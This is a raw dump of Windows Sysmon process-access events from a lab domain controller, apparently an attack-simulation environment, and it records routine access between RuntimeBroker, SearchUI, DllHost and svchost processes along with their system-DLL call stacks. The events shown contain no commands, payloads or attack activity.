13:30:12.295{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+13d1e|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+180a8|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10ec7|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000012009Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.295{08A6967A-4753-6000-0D05-000000009A01}11162916C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+13d1e|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16dde|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16f72|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16e8f|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1736c|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce 10341000x800000000000000012008Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.264{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012007Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.248{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012006Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.248{08A6967A-4753-6000-0D05-000000009A01}11162916C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.onecore.dll+1a5a3|C:\Windows\system32\windows.cortana.onecore.dll+6118|C:\Windows\system32\windows.cortana.onecore.dll+5b70|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce 10341000x800000000000000012005Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.248{08A6967A-4753-6000-0D05-000000009A01}11162916C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.onecore.dll+1a5a3|C:\Windows\system32\windows.cortana.onecore.dll+1a642|C:\Windows\system32\windows.cortana.onecore.dll+16b12|C:\Windows\system32\windows.cortana.onecore.dll+16a5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000012004Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.248{08A6967A-4753-6000-0D05-000000009A01}11162916C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.onecore.dll+1a5a3|C:\Windows\system32\windows.cortana.onecore.dll+6118|C:\Windows\system32\windows.cortana.onecore.dll+169b1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce 10341000x800000000000000012003Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.248{08A6967A-4753-6000-0D05-000000009A01}11162916C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.onecore.dll+1a5a3|C:\Windows\system32\windows.cortana.onecore.dll+6118|C:\Windows\system32\windows.cortana.onecore.dll+5b70|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce 10341000x800000000000000012002Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.232{08A6967A-4753-6000-0D05-000000009A01}11162916C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.onecore.dll+1a5a3|C:\Windows\system32\windows.cortana.onecore.dll+1a642|C:\Windows\system32\windows.cortana.onecore.dll+16b12|C:\Windows\system32\windows.cortana.onecore.dll+16a5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000012001Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.232{08A6967A-4753-6000-0D05-000000009A01}11162916C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.onecore.dll+1a5a3|C:\Windows\system32\windows.cortana.onecore.dll+6118|C:\Windows\system32\windows.cortana.onecore.dll+169b1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce 10341000x800000000000000012000Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.232{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011999Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.217{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011998Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.217{08A6967A-4753-6000-0D05-000000009A01}11161852C:\Windows\System32\RuntimeBroker.exe{08A6967A-4753-6000-0F05-000000009A01}1084C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\TokenBroker.dll+1acfa|C:\Windows\System32\TokenBroker.dll+1d475|C:\Windows\System32\TokenBroker.dll+1d7f9|C:\Windows\System32\TokenBroker.dll+1e8f3|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+5086c|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce 10341000x800000000000000011997Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.217{08A6967A-4753-6000-0D05-000000009A01}11161852C:\Windows\System32\RuntimeBroker.exe{08A6967A-4753-6000-0F05-000000009A01}1084C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\TokenBroker.dll+21886|C:\Windows\System32\TokenBroker.dll+1ac23|C:\Windows\System32\TokenBroker.dll+1d475|C:\Windows\System32\TokenBroker.dll+1d7f9|C:\Windows\System32\TokenBroker.dll+1e8f3|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+5086c|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011996Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.185{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011995Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.154{08A6967A-4753-6000-0D05-000000009A01}11161852C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41838|C:\Windows\system32\windows.cortana.Desktop.dll+164d7|C:\Windows\system32\windows.cortana.Desktop.dll+12c8b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011994Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.154{08A6967A-4753-6000-0D05-000000009A01}11161852C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41550|C:\Windows\system32\windows.cortana.Desktop.dll+9248|C:\Windows\system32\windows.cortana.Desktop.dll+12c21|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011993Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.107{08A6967A-4753-6000-0D05-000000009A01}11166152C:\Windows\System32\RuntimeBroker.exe{08A6967A-4760-6000-2505-000000009A01}4720C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\shcore.dll+316d6|C:\Windows\System32\shcore.dll+21cbf|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a 10341000x800000000000000011992Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.107{08A6967A-4753-6000-0D05-000000009A01}11166152C:\Windows\System32\RuntimeBroker.exe{08A6967A-4760-6000-2505-000000009A01}4720C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\shcore.dll+316d6|C:\Windows\System32\shcore.dll+21cbf|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a 10341000x800000000000000011991Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.092{08A6967A-4753-6000-0D05-000000009A01}11161852C:\Windows\System32\RuntimeBroker.exe{08A6967A-4760-6000-2505-000000009A01}4720C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\shcore.dll+316d6|C:\Windows\System32\shcore.dll+21cbf|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a 10341000x800000000000000011990Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.092{08A6967A-4753-6000-0D05-000000009A01}11161852C:\Windows\System32\RuntimeBroker.exe{08A6967A-4760-6000-2505-000000009A01}4720C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\shcore.dll+316d6|C:\Windows\System32\shcore.dll+21cbf|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5fc83|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a 10341000x800000000000000012304Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 